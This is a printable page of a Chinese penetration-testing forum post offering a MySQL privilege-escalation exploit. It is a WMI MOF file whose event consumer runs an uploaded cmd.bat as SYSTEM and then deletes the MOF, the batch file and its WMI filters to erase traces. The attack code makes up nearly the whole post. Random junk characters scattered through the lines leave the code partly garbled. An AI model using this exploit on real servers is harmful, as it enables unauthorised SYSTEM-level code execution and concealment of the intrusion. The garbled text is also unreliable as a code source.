中国网络渗透测试联盟

标题: Mysql 提权即时无错Mof exp [打印本页]
作者: admin    时间: 2013-2-14 00:05
标题: Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。
; u! E3 q( ]. ^! L' |需要将要运行的命令写入到bat上传到system32目录,然后执行。2 k$ C9 ]3 u: G5 c
% U( d2 K' N% a( y7 ?
这个sql提权MOF需要运行 system下的文件,不能定义路径。, u# C+ Q( n5 v( @) d; v
需要将要运行的命令写入到bat上传到system32目录,然后执行。
. ~# u% L: R% b3 u: i* [
8 x6 W0 i) k0 Q6 Z#pragma" ]/ J# j# V$ ^
                        namespace("\\\\.\\root\\cimv2")
' Q% l7 I0 U+ f$ s$ N, L                        class/ C5 n/ R2 K& n2 U# S
                        MyClass547
9 \5 ~5 l; ?, ?9 i+ i/ K/ x% `                        {           [key]
" h1 }( s: _! w" k. P( y  i- k                        string
! E7 A% T. M  P/ P. X4 L1 ]                        Name;) [: e  B) r4 R0 ]! w  [' g6 s1 G
                        };
; C9 Z* U) q3 ~" }$ j  l: }3 w                        class
- J: P# v2 k' Z9 B( L5 s                        ActiveScriptEventConsumer
- B% Q  F6 u, Y$ G! i- ]9 }                        : __EventConsumer {          [key]* Y* I" H6 w; o" O
                        string# Q+ X* F' C7 m" W
                        Name;           [not_null]+ L3 B( d- z. S3 E3 G
                        string
% L0 K6 Q" ~# @                        ScriptingEngine;           string
+ ?9 F/ N7 B2 }% [! V                        ScriptFileName;           [template]
! p2 i  e7 i  w6 \- H- l                        string
: P  C, @  B1 I; s                        ScriptText;         uint32 KillTimeout;; ]4 H8 w$ L9 ^
                        }; instance of __Win32Provider as $P {2 K9 G/ r/ S1 U
                        Name: v0 `( W3 ~2 x2 O0 S! T; _3 G
                        =
  f8 B  \- V, {) ^) |- w4 O                        "ActiveScriptEventConsumer";     CLSID =+ ]  @: h0 z9 _  l+ z$ R, G9 e: c
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
; Q6 z3 |, X' ?/ S$ ]; T3 ^8 G                        PerUserInitialization7 t0 }, S& B- L" J! ^' F
                        = TRUE;5 N4 g$ C3 I: o4 x2 k% `1 L
                        }; instance of __EventConsumerProviderRegistration {         Provider8 T  F* G4 D. L% c
                        = $P;         ConsumerClassNames& `6 M. L5 `7 C4 }
                        =- H% g  D, q8 B. g. p2 l- T5 [
                        {"ActiveScriptEventConsumer"};" z$ N+ b0 t' o* |. P3 w
                        };1 v4 W7 x) H) g& o$ r
                        Instance of ActiveScriptEventConsumer9 ~- ]4 V- Y  K2 U2 [" T9 f
                        as $cons {         Name# R+ T) z9 M: c
                        =
5 z" v' L6 f! W) _- X' {                        "ASEC";         ScriptingEngine; h+ m- N' j- v3 g8 J
                        =2 x  M# l5 A% s8 i+ h3 [
                        "JScript";         ScriptText
: W; O3 Q2 F5 m+ w. S                        =
: S9 {$ s" r1 |) F% h4 M8 O+ l                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };: @8 Z9 M% {/ T  T  _
                        Instance of ActiveScriptEventConsumer- m) P! a  e) s: c
                        as $cons2 {         Name7 E  n' H& U' l% C% p" t
                        =$ ]. w% o- l& G/ K
                        "qndASEC";         ScriptingEngine( I) a2 j) u3 H1 }1 a8 a" v
                        =
/ f/ ~; j1 p% E: U                        "JScript";         ScriptText. |9 S) S) g9 F( j% J) Y" }
                        =2 g! s5 |) h5 v8 ^) Y1 n
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
7 K% v& R3 K' {! @4 s# P                        }; instance of __EventFilter as $Filt {         Name
# w. r  {9 \; F+ j, G                        =+ X1 }. ]4 R: t  n" C* ^! h; X
                        "instfilt";         Query
6 b' {  N' d- z' D4 O( g                        =  L' l- C! j: X1 I. s9 p
                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
" Z! z7 z' m. p                        =
+ b' K. R+ b8 Y: u                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
. ~7 \& r0 G7 o( N' z, G                        =
5 j8 q. M( v% d; W5 N6 K                        "qndfilt";         Query/ S9 r& H8 X5 }  u
                        =
4 Q+ q" S" T: T+ ^1 J                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage1 o7 Q& {6 `$ I& f# V2 P: {
                        =
" `  E. W0 j3 P6 x                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
9 t9 O6 F1 X4 Y" O                        = $cons;         Filter- d/ \1 }. z* d6 K. [
                        = $Filt;
/ X; S% p0 E5 i6 O2 A/ |                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer5 o, r, P5 A9 k  B+ ?+ C
                        = $cons2;         Filter
, E3 J; B" \9 N8 @                        = $Filt2;5 t  T( e7 o& O1 n
                        }; instance of MyClass547: }# }! X9 k7 {
                        as $MyClass {         Name0 l, v# f8 T, Y/ m! i+ X
                        =
  M9 T- N; V% Q3 @, C                        "ClassConsumer";) x! \" g8 e. ?
                        };



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2